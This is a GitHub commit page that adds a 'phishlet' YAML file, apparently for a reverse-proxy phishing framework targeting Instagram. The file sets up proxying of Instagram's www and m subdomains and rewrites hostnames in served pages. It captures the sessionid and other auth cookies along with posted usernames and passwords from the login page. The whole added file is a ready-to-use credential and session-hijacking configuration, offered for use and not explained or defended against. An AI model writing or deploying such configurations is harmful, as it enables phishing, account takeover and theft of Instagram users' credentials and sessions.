Skip to content

Commit

Permalink
Merge pull request #156 from princenasario/patch-1
Browse files Browse the repository at this point in the history
added instagram phishlet
  • Loading branch information
kgretzky authored Jan 15, 2019
2 parents 5a477f7 + ab66cde commit faad8ef
Showing 1 changed file with 23 additions and 0 deletions.
23 changes: 23 additions & 0 deletions phishlets/instagram.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,23 @@
author: '@prrrrinncee'
min_ver: '2.2.0'
proxy_hosts:
- {phish_sub: 'www', orig_sub: 'www', domain: 'instagram.com', session: true, is_landing: true}
- {phish_sub: 'm', orig_sub: 'm', domain: 'instagram.com', session: true, is_landing: false}
sub_filters:
- {triggers_on: 'www.instagram.com', orig_sub: 'www', domain: 'instagram.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
- {triggers_on: 'm.instagram.com', orig_sub: 'm', domain: 'instagram.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
- {triggers_on: 'm.instagram.com', orig_sub: 'm', domain: 'instagram.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
auth_tokens:
- domain: '.instagram.com'
keys: ['sessionid','.*,regexp']
credentials:
username:
key: 'user'
search: '(.*)'
type: 'post'
password:
key: 'pass'
search: '(.*)'
type: 'post'
landing_path:
- '/accounts/login'

0 comments on commit faad8ef

Please sign in to comment.